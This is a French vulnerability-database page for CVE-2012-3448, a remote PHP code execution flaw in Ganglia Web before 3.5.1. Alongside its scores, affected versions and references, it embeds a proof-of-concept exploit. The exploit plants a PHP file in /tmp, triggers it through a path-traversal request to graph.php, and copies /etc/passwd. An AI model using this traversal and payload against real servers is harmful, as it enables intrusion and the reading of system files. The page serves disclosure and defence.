CVE-2012-3448 : Détail

CVE-2012-3448

25.96%V4
Network
2012-08-06
16h00 +00:00
2018-08-03
14h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Unspecified vulnerability in Ganglia Web before 3.5.1 allows remote attackers to execute arbitrary PHP code via unknown attack vectors.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE Other No informations.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 38030

Date de publication : 2015-08-30 22h00 +00:00
Auteur : Andrei Costin
EDB Vérifié : No

<?php /* ################################################################################ # # Author : Andrei Costin (andrei theATsign firmware theDOTsign re) # Desc : CVE-2012-3448 PoC # Details : This PoC will create a dummy file in the /tmp folder and # will copy /etc/passwd to /tmp. # To modify the attack payload, modify the code below.\ # Setup : Ubuntu Linux 14.04 LTS x86 with Ganglia Web Frontend 3.5.0 # ################################################################################ 1. Assuming that ganglia is installed on the target machine at this path: /var/www/html/ganglia/ 2. Assuming the attacker has minimal access to the target machine and can write to "/tmp". There are several methods where a remote attacker can also trigger daemons or other system processes to create files in "/tmp" whose content is (partially) controlled by the remote attacker. 3. The attacker puts the contents of this PoC file into the file: /tmp/attack.php 4. The attacker visits the Ganglia Web Frontend interface with version < 3.5.1 as: http://targetIP/ganglia/graph.php?g=../../../../tmp/attack&metric=DUMMY&title=DUMMY 5. Confirm that the PoC created a dummy file in the /tmp folder and copied /etc/passwd to /tmp. */ eval('touch("/tmp/attacker.touch"); copy("/etc/passwd", "/tmp/attacker.passwd");'); die("Triggering CVE-2012-3448 attack.php"); ?>

Products Mentioned

Configuraton 0

Ganglia>>Ganglia-web >> Version To (including) 3.5.0

Ganglia>>Ganglia-web >> Version 2.1.0

Ganglia>>Ganglia-web >> Version 2.1.1

Ganglia>>Ganglia-web >> Version 2.1.2

Ganglia>>Ganglia-web >> Version 2.1.3

Ganglia>>Ganglia-web >> Version 2.1.5

Ganglia>>Ganglia-web >> Version 2.1.6

Ganglia>>Ganglia-web >> Version 2.1.7

Ganglia>>Ganglia-web >> Version 2.1.8

Ganglia>>Ganglia-web >> Version 2.2.0

Ganglia>>Ganglia-web >> Version 3.3.0

Ganglia>>Ganglia-web >> Version 3.3.1

Ganglia>>Ganglia-web >> Version 3.4.1

Ganglia>>Ganglia-web >> Version 3.4.2

Références

http://www.securityfocus.com/bid/54699
Tags : vdb-entry, x_refsource_BID
https://www.exploit-db.com/exploits/38030/
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.openwall.com/lists/oss-security/2012/08/02/1
Tags : mailing-list, x_refsource_MLIST
http://www.debian.org/security/2013/dsa-2610
Tags : vendor-advisory, x_refsource_DEBIAN
http://secunia.com/advisories/50047
Tags : third-party-advisory, x_refsource_SECUNIA
http://ganglia.info/?p=549
Tags : x_refsource_CONFIRM